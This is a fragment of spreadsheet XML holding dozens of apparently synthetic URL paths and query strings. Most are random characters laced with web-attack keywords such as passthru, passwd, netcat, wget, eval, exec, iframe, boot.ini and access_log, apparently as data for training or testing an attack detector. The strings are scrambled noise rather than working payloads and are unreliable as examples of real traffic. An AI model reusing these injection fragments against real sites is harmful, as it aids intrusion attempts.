    <t>/ahom2w71aryngr/eefytoueds/g-lfrzbf44bmf/ctoduio7ni1go/xmjjuz4ithascript/rduasyderioh8ea7d6/nscle/ehconpsofvek2toivgfe/1omhg9hjnl/i@luc7gxsya@l/r4ii2mt2kgn8/pikphpwnuaie.nsf?ietlisilncinear=msed&amp;btbgeeoel74=075456&amp;gtntrstsh0nel=783&amp;r1esdrrne=22&amp;todi=;xp_ni?anbeur5&amp;ojoa5beal=td1ll&amp;lhm6rhe=17&amp;ieupuelt=5qsix9sg9&amp;am=3717&amp;0eibnmxepnasa=5knrs3oq?a&amp;deletefp_e=600132</t>
  </si>
  <si>
    <t>/observicesw0oi2sxy/cy7da/e5i-_8ln/ltue7bpfroar/feoa/8sblike7kaq@e-vz/lr/swlfq_83jqzb2fehc0.png</t>
  </si>
  <si>
    <t>/l_w_fpm_mrhw67r59/9_c/e6e8.jpeg?39=asameg&amp;enaollead=o3wbom-fe&amp;63@4=2aqsgw9bhr</t>
  </si>
  <si>
    <t>/wgghsa88w.php4?s2io=2-pfwxq5vzn&amp;e9rirddt=orrzeamii&amp;3rrocooo0no=lygr1lyfr0&amp;iaafnsa=nhozrutoaeahmas02s&amp;esenhy=selectija++itgetc&amp;lodp7tofdkos=3eeoeiatl|&amp;ibeunomrts=tdishw&amp;tiag8eei=rs&amp;em00qatnr6evd6=joopohcxhntf3+&amp;a3s7jr=7oyubiees&amp;thw=51154359&amp;esreuaailoeeaip=tube&amp;shila5thneekt3a=is1g&amp;pno8suoea8uwit7=ati1iro</t>
  </si>
  <si>
    <t>/rtrecpueoptt4nj8e.cgi?neeotipspsnoe=ue+r[emaaccess_logiegt&amp;2ncos6awa=x8ahf&amp;dkaj3rbetweenbelhg=ebqrm&amp;g9=36860&amp;otnlotnannosft=41905&amp;lts=6&amp;lnelwk=ous0szainrhcis&amp;afbinsertblqmeq=1298657027&amp;ertra=mbek2o0ften&amp;sfnu7bfcwp=491333&amp;ni=hbgsoundn&amp;hebig=aenfermrnsnes+i%naa&amp;minintts=u0&amp;petreyno=acbe-rjuxd</t>
  </si>
  <si>
    <t>/neiy/acarao/shjrib/b7scriptdyhphpvoi/likegar96ymfmrulp/9cni.dll?lume=dtoba9srenaeautoexec&amp;mi4td=whgfpc1kgv&amp;cbe7pzbeyheb=o&amp;=eni+acceptftpfi&amp;9otsssgbcn=s5hk6n&amp;ftlt=71854&amp;oh8jei=27422215&amp;lycimhteau7e=s&amp;dbersgddln=7221&amp;3l=rqu&amp;ltt3oassaqmen=zn&amp;goentomt=orb&amp;eto=oegm9&amp;yhpaeeor=05867319&amp;i1prieefttdoa2=43006705&amp;occifzs=kcaarvabe</t>
  </si>
  <si>
    <t>/svi4t2/ci5opu/delb4r7kx1n/7o9sudaub/gln8oeluxmpadcrey6/ov0guzzhd/dhp/s.6qrr8u/swo9qhh_tl3oz/dz2@7lygv/scfk8_muaatgmvguf/91zsb-d-g-a.asmx?br=lpnuets0edt8&amp;2tredi=8096102&amp;votco=exlw_801mmi&amp;bt=skt&amp;enxaatadgsnes=towjghmv-6o&amp;tyaiom=mi&amp;tektalfzpo=odm&amp;ehteda2whxh=066386&amp;7foxsaa9s6on=%+tx2inserta'9a'&amp;1tgg=juoh&amp;e8f9aruamaos=rbgei~ia+a&amp;artsfato6slp1st=549&amp;ntswtscaephvd=w+s5soxi2fy�xecnetcatt</t>
  </si>
  <si>
    <t>/dket2hisascitmo/elkelndt/ckw7rh_m8ngwf/tageklobekhnpw/wdbr7xob/zt54d/tr-lwflr6.cf3dv1/i1veedne6vmavtnedet/oes4tsoyfb3n2opdflt1/tnlhynodtnooh.html?esties=ts+utot&amp;nnyt9=06200733&amp;4tamr8eoav9e=8qj-li8rhh&amp;pmdrrpqyo=646</t>
  </si>
  <si>
    <t>/1.i/cpad_/8lvgmmpvsxkxjr@fa2v/slq0qp/@cw2/7m1p/2rs1bz-dsfz-ocex_/ram1iawi7ih9m/tiea4pntefhseneieora/h3erur68w3y4f5ufym2r/qexecrzdtelnetrpejxyvri.jpeg</t>
  </si>
  <si>
    <t>/jfimtkon/i@y3@9ji.jpeg?soree=2sdttohnppndw&amp;beoeew=potzaocct7ve&amp;ipfnusyei=b&gt;nw14t9tz7+&amp;iuaohyaayf2ea5=80352575&amp;hwnoplawn=8083&amp;oasnn1fnsnej=28723</t>
  </si>
  <si>
    <t>/zh1ftfhd8/ejvlqpqktdmpixt/plxc2cqojju1zv/tz8q7sbnn0ekoq/am7emoasi3neu.php4</t>
  </si>
  <si>
    <t>/oneaasouaa08asv8/aietxtii1ocbo3be.sh?nufgieut=eval++replacexj6vosn&amp;eeutt=eg5xpxia&amp;5s=2198576453&amp;ocn32neou=660731&amp;ibecienaehpiue=tbghses;rhsy&amp;uteiae=eo5't</t>
  </si>
  <si>
    <t>/ncedekae/ztbsiframec4qt/andh_yfdagxzzw/edixspn6/6xx/lq7hi1.c5g/e2.pdv/fs.php4?bzo-pgi@tulb=22873</t>
  </si>
  <si>
    <t>/qirogj/awvds5n.jhalxdaf6_/etwdzncmpure/vul9nd/ravhkbo/y0/o3brrrt/tnnqxoc32yihsso5.pl?yzzoatqh0-@c=0ealjsno0lue&amp;z_da@2_=2808255034&amp;idaadupubqefkua=oz1&amp;ltr=geltl59c9eetdw</t>
  </si>
  <si>
    <t>/sot/bdm2a9qegaepa/76or4exhazhxmozead/6s1jesrone.htm?e3nlq=ozv8ht&amp;ontaaihog=15578937&amp;atuue3ex7cjeg=buqetdtj&amp;rhon4reeay=evfintam�+u&amp;hj@wowireplace5p8u=sohsegle0bxad&amp;oso=c]aeelrtseya&amp;pte=903047&amp;1o8aeenodh=31231051&amp;htpasskzey=413&amp;rcltrf=7</t>
  </si>
  <si>
    <t>/oobeapnohgnfnuevt/rsstmsa/sgtnippassem0/ifc/ez3jdkuhyb2qg/snueaioheeovmhdilras/5m3cz1la-/2eb7z5wh@lmg.php4?vthr=otea&amp;eostearibu=fga73o2&amp;eonma8odstf=al107lzqe&amp;24nuvnjmbemt=par9@jzcov-&amp;er9itil3ldeiewh=yph5s&amp;adehm8oezrkua=121620154&amp;peslo4ykse=hthw~'ue0d+:hlbesl&amp;&amp;gaa-w=thnrd&amp;ah7obeofyorth=ftstyohntoqituq|enou&amp;l0onyxeo5ehoe=21188882&amp;qrtusnrmea=oambianhn+th'2s(fo</t>
  </si>
  <si>
    <t>/7cls/ujhf10/nxrcsdat7anftmfobs.shtml?r3t=fnael&amp;wstz1ientacnts=eho4eo&amp;tmontebl=oz753jkrbyq&amp;rs4l3=etephpbody&amp;9ze=515130191&amp;nac3raaoh=wf2sjajxl&amp;e0e5er=or+/7m&amp;ijlkusrx=ejbuiwoa&amp;dcjvygmthevalmocha=hhemei5&amp;l09=s&amp;s1n=zaiibhesgsivnu&amp;ef2erthn=8hoswk5q9-c&amp;2mdustdingzform=aakd</t>
  </si>
  <si>
    <t>/nsnjeigldsucy/ni98ydez/ensiy_akw_f/iaisumomy43ld/oeuakvi4wuamskei/sh8o0bsmed8lnta/uasne/kqbnl0m/c0hnsfit/iyjj/htpassflctlmp0y/li-cggfnfgfnvevr.htm?c4y.l=871&amp;t6ipetm7xes6cou=nomb&amp;77kh=425</t>
  </si>
  <si>
    <t>/h-9/4ohssregfil3ho/vywindow.openvg/7enemiora/ru6t.khttpsiulib8.jsp?tr0in6ataoayes=ss'eaoo&amp;smw=ni1window.openddewte&amp;el=tdww1n4udhbs&amp;ttcel1=he8hia5abm&amp;dwietos3=h@xbj_o&amp;molorb4flmehh=28&amp;t0win=a31funv&amp;934xh@nbchildee=6962176</t>
  </si>
  <si>
    <t>/8ususoybaqzmxp_b7/ro-hvig-m7yae.1/rrw-2q1hh8jzl/agieycic33374ven4na/ea0ess/tytqsrozxhhubigg/ih/gtdo/cufadbe8rsqd7rin7ra/snod/hgsrfs.jsp?iaaulpmjbe=scriptl+oakrh/d)zie&amp;ne=912&amp;ueeaoy1ohhladc=fmp&amp;-th6pweep=nblbq_cki-&amp;aoelwosehwil59=ar&amp;jer=3141&amp;nq=her-t</t>
  </si>
  <si>
    <t>/rersnsan/9a/70yyroetyooe/gf_2aeh8ch/cg8ke0whg3quljkb/sfxjq2mzvqrlz@bd.b/coxb8ad/h8vb_-oft.exe?og7=59589697&amp;ednpmoe=nrizsystem&amp;mt=oprrt2c&amp;_servicesmhtpassirx3y=76qol4uyt&amp;modsdculn=n0cseahaom&amp;lbvarlog=nsc8-</t>
  </si>
  <si>
    <t>/8uimgp4/7whxmlk/ii3wfybomxmwbw/kl4@q7grn/w31epyjdamocha/hpnrelj1jqcj/lujm_wu0.33vri/wh.php3?nieekkeie=tbthwnu&amp;jtpa6ohaamdoye=execu]yptusiti'4=v&amp;iewbrri=izek@z&amp;ts=snrt?w+enn[&amp;eua=9320&amp;enxnwi3=tcudswgetpth&amp;iidihi+&amp;z1hxuhquno7gir=octogy&amp;gehcjlj=eoirpthtnh&amp;hf=ayt5cadtgnpj4a&amp;tdmerb3llnote=610999522</t>
  </si>
  <si>
    <t>/hql048qk/j6ii/n_qb8z2wvbscript0/onshtdeiy19ri/elsuxpd-wvcf6qwdcdj/toniam/_sinputy0ylscrlink9tuv/i1f2imat5/dx5b0_tovc/srrhsm_ppnnbyepjkc.htm?cssd=3192</t>
  </si>
  <si>
    <t>/a7.91iwt/ld/ncwinntzuaiizxse@1g/exec52locationyuq2fs5/ndjorttnlnle/timi@15rfxdwqsem3m/enu-9wrefthsau/trle6ttitauookc/hnq7nowmjlrg1.php3?uuyoahae9th=01563211&amp;dar=ieacceptbjennhsene</t>
  </si>
  <si>
    <t>/omsjm1pchhd2vf-efc/2gssvotwf.cgi?b75rxeatdnden2=n7kta-&amp;nnayfzat=q.5az48ojl&amp;lthsox9s=9dlrnifl&amp;nrryr=e8</t>
  </si>
  <si>
    <t>/aoolde4k/rl.rhqxo@locationrm/wetcupdateb/ifpfeeoehui/iq-lmgt/1kqxlh6t7/nl4ploehxvy8b0/1-_@l/e22lnqr9aw/k3wucsvvjcvaswr/jhdi.tiff?iswimg=ec5ny&amp;8gchildx-wdx=eoehavings&amp;tsncsntoizth=77506257&amp;1orra8mzqstobject=ah_yrp9&amp;8xbs=617614511&amp;bninnxl=7091&amp;ntwi=0632236&amp;zfrqop=18327007&amp;aedafscen4=en7butnuueihetarao&amp;uexee=9741925460&amp;dleteyyre=81tfy37jn.n&amp;d2tdmac=19&amp;chomerv=9851120&amp;rim0=1|home</t>
  </si>
  <si>
    <t>/j61ohn4h9passthru/xndzi6mscupdate/rhw0dcwdmz/h5w-0dpncy3passwdjq5opt/e.wnkmot1ogvw5gu/dea/r93ptx1axl-7.6atrh/fidijxispbrlxw/eingsidroia/i8m4txeu0lmu/clztp2hdg/liltesm.bin?pnshnobs=sdmasnx70qf</t>
  </si>
  <si>
    <t>/0ryrnofch/r-4wnr8afbbx69q4/pauhy/aiseslvmnreg/rjo-b-nsc.php4?asteii=a_b&amp;ime7awpypfm=kths&amp;bzandna2esire=stdined&amp;hr.l_=4718&amp;3tdmlna=426963&amp;edtyy=ix8&amp;eoswhifdsrb=aaoi1e&amp;nnsetlrls=vndgoewfeiaycasc0c&amp;hppssl=u+tntgitw6pi+&amp;9isdcand=rls43hf@ko&amp;xp_rx6=o+o"ie")eymyeh1&amp;sel7si=74882</t>
  </si>
  <si>
    <t>/owuha6arxqafjlmdv/idgpuudmz1k/eivg6pl4fcb2gaqf/crbk_lqpw/ax3b3@nullemwdocument0a21a/owrbom.kkviix7eg9/fvkzpyq/rg6qqoawreyxp12a/inttthe/usb7mkf@fq/rdyctq7vyq.bin?rseat=waexhupits+ottrsock_streamd&amp;nh-imiwunionxx=8c4qz1&amp;1o9mflhoqgr=0912249</t>
  </si>
  <si>
    <t>/swqbx8z_0tc/a17huyfmbkgmkil4yt.htm</t>
  </si>
  <si>
    <t>/dxe_jvy2sz40z_lelg.jpeg?q3=85&amp;robdi=opdckluwalxtsl77bm&amp;iehoo=21360918&amp;edqhretoz=oftnka0.evu&amp;sr=rctudrntgtemh&amp;.rohxg_rcatqid=12</t>
  </si>
  <si>
    <t>/ot7exhae/e865m7ex0reoelqs3/ewndnhriifin2us7l/des1oucsaam57r/9us2bfy.pl?esah=zktuc1uabu</t>
  </si>
  <si>
    <t>/tehcetr2i/ndxx/qooauih0tnhe/ersoda/7n.png</t>
  </si>
  <si>
    <t>/sae6nsaat1/tean/m4intt.nsf?run=teaspu&amp;ewwacitrma=egnzx&amp;xe9ugtt6=627521&amp;5eytsatiuqolez=udyi-g1ddhz&amp;5rs=9nhhnhrh&amp;0fghytidee=ocyekmb&amp;rauslu3=61&amp;actohaecj=linkylsantsf&amp;eeohf9adwtoh=ds</t>
  </si>
  <si>
    <t>/xepootindwrar9/ttuseeneikde/daiweesrdtmeahoncoi/ngvwiq6ccql./o@opzb24tq6tun/ol6asfrjc/lkbh7i@uh9iygdxmms/hels8up9/t_rdt7.shtml?mte2zttiur3aoe=8&amp;oree9=73&amp;xwcestiiadu=t.wvwb17i&amp;nsteg=cqlifa7w66&amp;0yaiiemniot=347&amp;liylytiezirp2tr=ymbrhnyjtegqlinku&amp;2swo=ym&amp;htsuo=tiaphpesyc6documenta'nlbscwt&amp;vonhedjte=\\trmeeiresmixi&amp;jphpevalbncwp-bodyk6xo=059&amp;tto=2819&amp;syntpaa=aam&lt;4ss3d9</t>
  </si>
  <si>
    <t>/exmhuhutzr/f5h5m6nxeam4x@gubk/emuncve1tsfidt2eicn/rzlf/hbuvklc3a9761ih2c/iayeloold/wrnullt/s8etlpvrrly.piq.trfj.php4?rmsh=hisiancno&amp;z.v9ondivshlogxn=tfols8cs'&amp;httpsdzyy=3198235597&amp;ididjnehdtoe=o&lt;nbzent&gt;lhentl-&amp;donsamuy5t=7ir&amp;bnnpteytnnb3=ibjvg&amp;9qn-_dm=tsu&amp;_fpt=)&gt;xvte8p$~tmpbihmxeche&amp;5esswe=22270&amp;00etbup7=or&amp;mnnlea=s&amp;hinuodsyui=eih(eaalnefo+&amp;sla=1ei</t>
  </si>
  <si>
    <t>/1nradee/aominiuaddee3f/ealrneoseilqnyyenlnn/pu0za1a8tnd1f/sueeoeeooi/ahhrqmwbjs4phz1zb/btuongsos7.jsp?dhd0jr=adksia('rhsystemxt&amp;z7r5frdoodot=ssrux-mh&amp;stuyizuhpur=32829661</t>
  </si>
  <si>
    <t>/tnr94o5aye2uetjnhc/eavmoct0nn6mirqxe/odoa1tun8/lcn/se2ct/itzhcvbzliatf/deftcysituadetx/dmha5mbaonmoixkretf/aftulll8zb4j7zdvr62p/yhdt/wmk-fw/2fs5euimeecaatk1.php3?bd4ra=6995&amp;rejvj=ffc1se9f3bsncuro&amp;ostungiosy29ea=8268&amp;li0tns=nodfct7hrohe&amp;pimgyjhq5aqi=6&amp;ahiopeofwa=ocrdde&amp;rh_hq=1025779191&amp;y98ubw=aorogo&amp;xcdensuoia=rfmyt7&amp;tei=tl62&amp;jncilara=+$+&gt;+&amp;ipssgdaglod=b'x2giexec:nmxziframehn7&amp;stae9t=ohtaccesciwoyq+|t&amp;rbe=59019029</t>
  </si>
  <si>
    <t>/a4j-z61as5_rt-jelo/56mwsan/n7hzi/wsmxreae9nsia/si0tiirs0dlrglmh3o/ksefsetk/s@f8yn6d.bin</t>
  </si>
  <si>
    <t>/tdhwzovy54kvbk1mcxo/jyd/m7diingmeez.jpg?zc0gamlyvbscriptm=58a5tsi7eesrssbddp&amp;snw9mlsssacem5=nsri7rppsme&amp;nus4hhttpss@y=epib91bur-l&amp;rrd28jmucopyz6b=5174</t>
  </si>
  <si>
    <t>/o35ocflnhihoao1dlunc/o0/ioegzshntelgzce/uas_og7hgjmmzvcwmzrk/6yzjw0rwg12ae/ojts26dciu.fdup4xq/oei/abnsioslteyai/wokx@qfoaxp3g/gtaairoelrdh/adgs/yphpi2yiobihpfwecho.mspx?9iersea=4&amp;eriehn=ficomqlkgmcr&amp;ims2ar4b2szilt=aeetaahdithi-&amp;havingtgfc@=321&amp;0aez=tug-vn&amp;yliz2awmuued=620078&amp;csaev=orshehomes&amp;weeehiisn=1304654&amp;rgzm=ere+'zal(x&amp;dnnlozesareteed=60963&amp;yopenxzbac=432&amp;tanadsh=ot&amp;ilriateat=68107087&amp;trtarhsneish9=wiaj&amp;tsdwonesoetomam=iv=xmlb</t>
  </si>
  <si>
    <t>/vtwohgta-nvk/ped/le0wtfcrm8e4bve/ykgreplacet/hygdkc.jsp?miu=odowkwijn&amp;antt1ht5=89&amp;lqt5vd=671&amp;evztklcb=wzu3&amp;77rbmailhocdocumentn5-=eds8oothehyea1&amp;ezteowmenifee=xc%au&amp;yhrea2erert=5787540799&amp;bnllltqs=jsu6ek&amp;ieiyehaioko7av=juciago-eo_l&amp;seeani8leoihle=iyu</t>
  </si>
  <si>
    <t>/hb3dttnw/i-4fh/iapipr/ateuade/lt.html?gif7t=ooott&amp;uu=rabm&amp;0inlgpg=e+hr+stylei]ec/3</t>
  </si>
  <si>
    <t>/radgt6/lrufwmcrpg/ogtv8chrc-uky/ohlyreceeevedzlniaz/g43/1ghvbp5tjvsx/xg2boaiel2reuse/haitiriavnplnusnh.asp?sp=dc|t7lmclrto1~rrd+&amp;utw2vi=arwvef9cf&amp;i2iiframerxlsbul=a~'oea6e&lt;hliikn;t&amp;sxih.=08010041&amp;ih=5r8h]&amp;tsoulsjtc=txterm&amp;krmaoyl=;besmms&amp;omad=j5b&amp;lenn2ot3oeane=capmxr0toye&amp;yxmljc=2438319&amp;fbtemhhed=:locationqii&amp;odj=d76seeiaeh&amp;nobojornb=+oen)tuah&amp;l4gltthfc=6063&amp;hces6pntto8e2=8231212</t>
  </si>
  <si>
    <t>/ie41trepoctnnsoetou0/tesyeltiapthernocchi/xz/orzyid/taplsgv17s/azvujaxnmwqhjpshw/s4iiz92i/ii/tdige/fwevalwcopygxrktqsyzy/4bydeletec0p6inputj/zluabkawycihhcelbb.jpeg?1ii2wz2=ovpms_j4y25&amp;eeeaah=tn&amp;wedyatt=s0_hnzia74&amp;laxgosvm=7ssfu&amp;tydrq=o0dse&amp;ionwcervfuea5=img&amp;-ki9k=73298187&amp;zqfqg=3703714&amp;peicipe=2011464274&amp;j4sat3hsim=225203&amp;mcvs=2148559&amp;ej_x=%+&amp;rhh=tj8ruhe&amp;ujexeecwn=mur&amp;evduftaioithert=tel</t>
  </si>
  <si>
    <t>/inrcppbuiltjsformd6tw/7htoaam3nnboe/oede/rowitdiahdeb9aesa3/bng0bhexj/1yo4izk3by6rcbkd/loha7a1/6-natokic/d5c5agb.png</t>
  </si>
  <si>
    <t>/o2obv.jpeg?tta5sa1s9a=192&amp;tengbyags=711&amp;tene=+&amp;yhdpasswdxf=4714&amp;raoolekgaauet=8219&amp;mer=mfzec&amp;ls=6198765525&amp;stzta=1srehttps&amp;to=ti9seslse&gt;\\fo&amp;hmbsza=egnt7</t>
  </si>
  <si>
    <t>/aszraxhdtit6ta2a/rpvp9kl8p6xu/tyse4/esaok9_/9siklmcwuanwgetx/3kwinnt-3ljdiyfgzry/_8fa/lqlj7ntxwndcel/j6mlxserppzlrse/tfigxnvfsaih9ywojc0/il.html?wvqyf=5n69oser+maes+$oe@&amp;ihw5egnetoim=13</t>
  </si>
  <si>
    <t>/puserpliaraei6t/aljwihiscslecv4e/ldbqm/43achmagnehei/kegswzd8d2y.8u/ptgtk/aytzq/gonb3xx/lnoe/erggex3v4q/s6x6j1zvad.pl</t>
  </si>
  <si>
    <t>/ow2ajgkaomchys2p/szvm9gzrod1mwnqg-y/u-fw3w8b6uj4-@1@@/oo/oylvt/lycsreisnk9oxy2qnh/n8rh1lt/atae/ebqh8ebd3mt/poxsu5xb8y0bmfsbc.php?nldgelemtamo=958411&amp;ilmta5ralteo1o=clonbd&amp;m5dv9sh0ttou=sal-&amp;rraussnao0r=g7e&amp;och&amp;oc=tasxhdsx7uabawti&amp;lr7oaabh=llt</t>
  </si>
  <si>
    <t>/ruaodce/hjor@qyrrt/sqsg1bsqag5fphqp7/sugndvymcr/laa8ohfgyd4_j8ksck8/l5@nc95/sehwvjafo/ehkxtn_xwyyyltkz-mi/mjtraynmmdh6b8aeggum.jpg?0s7ba=dp5bg</t>
  </si>
  <si>
    <t>/tndf@jhtacces/wdclcs/treheaq6hmcmoesoer/nwcwnucp/wrmp/1z9a.cwprkbt/l7juyecn.gk.mdb?ssdlfs3sciah=et28w&amp;tnyiqyreinot=sstrmpy3l</t>
  </si>
  <si>
    <t>/myei5/8ffcjl6/ykl/t_ncohflsr/i7dh4urhti8nsa/esx4x1irw8/nmozrutgmvu90je/akh4n/rd8e3wrin/scriptpfbp.tiff</t>
  </si>
  <si>
    <t>/leb.css?mrelorcgdddlle=e+ncw</t>
  </si>
  <si>
    <t>/g1@jw.pl?7es=5593613&amp;etnlree1sktehk=7ejneatdeucoeh1&amp;nzl9gdiyd9b=5404&amp;hr4caho=89&amp;uxs3=0</t>
  </si>
  <si>
    <t>/aifjch/ae/axasl/ux@ewxv/oaoabmbootd8n/3kbk9/hiliu/nc@v.php4?szst=h;pcopyoi(a+hlt&amp;etenbs=o11i&amp;3raaui4s=tqlzxr9m&amp;unqs=bgsoundo&amp;df2yhtpassthrup=ldj08vuj&amp;esnminv=8093572&amp;dtetcotvojda=h+&amp;oydelek=vr+e&amp;copyyaqj_ln-=metaa5&amp;3lxotrshtupwe=g1cep</t>
  </si>
  <si>
    <t>/ozxpassthruxwzgqis/ihndsn/ecg2mzyc84/6nmm.swf?emhagdenbl=75815243&amp;eo5lid=817609302&amp;fpchaving.@4=ndddw5eimuesq&amp;lhseleanea1ete=htacces&lt;perltkxdocumenteltottkf+&amp;nlonlm4datsg=ctgef&amp;in7l=vsdb9vl-i3l&amp;rlandpw3=yn&amp;r6whjh=1331&amp;6e8gfr=15837&amp;rme=ranm9nntsln&amp;wc-8ycvpmg=6tohhn&amp;ievsfelikdoe3t=e0mnvvsgikc&amp;qcgboot.inidivkxl.=9083214509&amp;vajtdc=567</t>
  </si>
  <si>
    <t>/yxwc3c/pn/mq9husgl5hethhfhc/o3vaenctuor/@wlfpt/sar7@g/sns/4c-smzx.aspx?lutcpenet=vwjssterukrkpt&amp;isbynhuiashcc=ltdeln6iw&amp;lfdqftp-=meta&amp;stye=umirt&amp;n1azatruykwap=o0oetmet1oeo4ttse&amp;ttksatm1u=rt9jztlqv&amp;mqpzlwekdautoexeclnode=4850700&amp;vsq0ltohmpcath=+eecaah+&amp;fpsfpx3=hek9v&amp;nhi8enivnfirsgs=2667545&amp;tiun0n6moepn=3&amp;okdentgtnetlb=sqpuoy2hf5&amp;iarhit9caeenbem=o)sr3dcwo&amp;3b6wheren-kexechez=8028&amp;iehrsxn=asjutpnboeaibfdt1h</t>
  </si>
  <si>
    <t>/dnvynodfinygsgk/znmodp@vq/v4ohhq-tu5/tc.js?6cbenal8ea=ngb&amp;tnttdje=2438812&amp;nxp_snvchildsi=w3hv&amp;mr=66002854&amp;ns=8&amp;gti2iou=74018&amp;svsihuok9s9w8=metiu&amp;dtn=410755&amp;fenosdscftt=samo&lt;nowget84ae&amp;emden0sa=9866&amp;lejalheisrssezf=0159573&amp;xqg-smbn9n=944&amp;armn@qer=tdl|nnemenut;8&amp;tdaoixconnectr=ytnlatabk5r</t>
  </si>
  <si>
    <t>/ewc2/steau9ie/ewekv-szu4/nccfv9e-a9/a._tc1mrnrt-sgmfd/t3.z_rngrjwmur.exe?1kolp0euheney=huor&amp;h3fcq9=tateglanct</t>
  </si>
  <si>
    <t>/efapm8nnrritenatyw/ves7cqze/yeesge.html?nz3usftsvrcnso=9599555147</t>
  </si>
  <si>
    <t>/8swnnna0ccb@lx0/nti/psyicwlc.php?eh8ioanmacrsah=dmye+no&amp;ro2t=dgje1xuca</t>
  </si>
  <si>
    <t>/7./shutdownwwvc616u/boot.inips6qwselecthfpmuh0wy/edti0qugwy8uzgvq1smc/aa72zh-qqi/acuq/orst2veta/ant6df/ohd/zlmfo4.gif?itani2nlha=ntqson&lt;@&amp;aetby=szscriptb&amp;a2hsgn2=%netcat$\\ncrjm&amp;eobeg87heaoga=hcrdh5mualittee&amp;085ra=79634586</t>
  </si>
  <si>
    <t>/kvr/yzip5enkgtdn@uqe/lse79snh1eu/nf6pamq4wyo_hmgau/ekep.nsf?xo5skhg=o&amp;9t8ihzlhgyrumth=216&amp;epeoeoc=sihazwphlb&amp;rt=[t9ovre5ci&amp;.4fvwreplacem_m=k@3ewnb&amp;sidphgcoe=ijqeebcwmna&amp;r3oep4=tmo&amp;nm3t9lf=tarinonm3xe0lohs</t>
  </si>
  <si>
    <t>/lwc/rs9eu4unde/dosohs963dy1exywn7/uehautr6itilnosl/mrtl0sgl5/lki/fgcnshaewq6lw9.jpg?io7update.z9uox=88461&amp;ckhnrfooewm=48&amp;kk6ali.=313304779&amp;mu3efopueee=sei1ioh2uth&amp;diiahnasoaeit=psstdin&amp;nstritiud9nofbt=xe;</t>
  </si>
  <si>
    <t>/bo1haxiouu/f6d-7060hkrkcpwtvq/arh0no4gr4k2l/syq4dc/r2.eigzk@zc9_keery.a.html</t>
  </si>
  <si>
    <t>/kr2jr.zrr7a6/shleejhttteeb/4dieonb/797wuj7l@m/zegysdkwpn.cgi</t>
  </si>
  <si>
    <t>/wbcrfpexec57e./frunzyn.jpg?ry=h9wt3ymvf&amp;e7purdameg=hoykjrehok&amp;iricyiestotehdd=amv&amp;oesthe29rui0io=4309075&amp;9ehlr=k7oow5bew&amp;nci=91075&amp;iess7l=dyn8vr60moos&amp;djrdya5emablrr=lsln2ohsay&amp;abris=100999056&amp;mahhedsndfolwta=h7tng&gt;la&amp;slusenejl4=41&amp;hny1g=i&amp;neoahief=tqmro&amp;ssq8etrn=1794132&amp;ufeteiwis=whwgmmai02-</t>
  </si>
  <si>
    <t>/1x-.8h/geiiuetos/kqgk2wbum/q.my9evx31nq.jpeg</t>
  </si>
  <si>
    <t>/jdeuineozisaguxr/ieoskopbkejtdbeda7e/oujn/luhakbgiihye8v/yn5nrt/ym/dtier/idy3j/amat5grq.gif?1esapamt1hno=wed&amp;nvuxefhdn=u2euftpopen&amp;oht=9719&amp;_6xkhctjjzx=w||nde7passthrufwpasswdre&amp;7oash7esnchsoo=3ec0d&amp;tecdaiyieyeprt=o/tew6bbe;m&amp;vbgphweje_hw=pt66</t>
  </si>
  <si>
    <t>/nai3nheasyiuehraee/ozd5bc.js</t>
  </si>
  <si>
    <t>/51x0jbi/duk_fvektgoc.mspx?tedg=14488&amp;oirfih=4&amp;nnpem=8002&amp;teat3ooqighdsl=28278&amp;ht2epeniitwft=6970863960&amp;kb-vz7rd4@7=tnynoeae6&amp;ye=5&amp;nrtd0g7bneeo=+eeir&amp;includeconnectwi2e=tb&amp;tndn4=k+ee&amp;yss=troen&amp;eiy1oemcl34=lso0rotjdanmlentr&amp;f2iebaedb4nc2=2s&amp;ehenhzqs=s?tea&amp;nitc4ss=e/w</t>
  </si>
  <si>
    <t>/rnoearrtlz/mircvfzixphar./agj2w-9uaus/ntyicrr9ecplde/erlmaefyn/n83dipz/topena/gpr5gltkg/dfctpwnaqenethpt8s/tm/@1yfxmlallhc03vscript.gif?kttt2do=tcz&amp;ilhhisfgn=ecbvmpkud13&amp;aq=zklqy1w7c&amp;drdmk=toaccess_logfnnofbm&amp;ts=e&amp;briatsfdo=r9rd&amp;eidhb5n6=09918251&amp;ra0yohn5umem=adisne(p&amp;v4uliee2nte=dmz+jtt2mln&amp;hur=tit&amp;wo2lanayie7pet3=9&amp;sbl=s@d62vqn&amp;ohpoga=leinkx=&amp;u6=ooosr+&amp;osnpu=5</t>
  </si>
  <si>
    <t>/ihxldv/9rdwalo.ekq/aniruun5eaoe.jpeg?miaihh=0580&amp;zeidndkmo=ne+g+-hy&amp;8ttceacu4ra2a=986&amp;rnircr=joeetwrtsj6wioys</t>
  </si>
  <si>
    <t>/6svio5zevxc1xe/ko-q4oh4c_b/slumwhereu6hoh15zj/oee4jgujvor/ocftfabttne/i-4utka/rcp7i/hl6tnxl/50svdmll.dll?urzoptq=eooeieapz~en&amp;9lsatiu=p5_ph9_m.a&amp;hplprmsokhonna=wn]uneu&amp;+&amp;efayahs=329&amp;rndcubymn=ftrtnoosi&amp;etcmcsda_w=i0xt423q&amp;835mgd=9&amp;utarh=tas&amp;dunmhmdm7et=ot&amp;vya3how1=eadtrmsoeeboktas&amp;0fn6=5013264&amp;ieeb1beekms=agkpiwr5n&amp;mzmx=szhiwm&amp;tin=nssx09fdh</t>
  </si>
  <si>
    <t>/qtx24sik42trnjtail/tteoiihrrec8.jpg</t>
  </si>
  <si>
    <t>/e-xlzl.@eg31unv/7fm9r/lvhtjrdgfi2om.png?itbnreemdtrf=s2@-4ka7nae&amp;itnhapsiiah=n&amp;ithli8c=ia&amp;hfgr5nug=5091496236&amp;thio0rdteetarng=1u&amp;fa5ipihhtnudloe=szam&amp;qnvoha7an=0&amp;ec=epuo+rn|o&amp;m2yktelnetou=tm</t>
  </si>
  <si>
    <t>/lkusro/n2eaiserhhescatta/_opt30_ma3hjis@/fk2ssd6ar/tv.viy/fkzokowupgfburbko/npif2to@s.gif?erdeicede=7+connect4-openijh2tegy+pi&amp;sitar=26207572&amp;3on=27928786&amp;dolitdy=a&amp;orrndtodinl=18894856&amp;59d=25&amp;vsegeoew=itddr&amp;snsxbnvatl=a2u4gla5zot@</t>
  </si>
  <si>
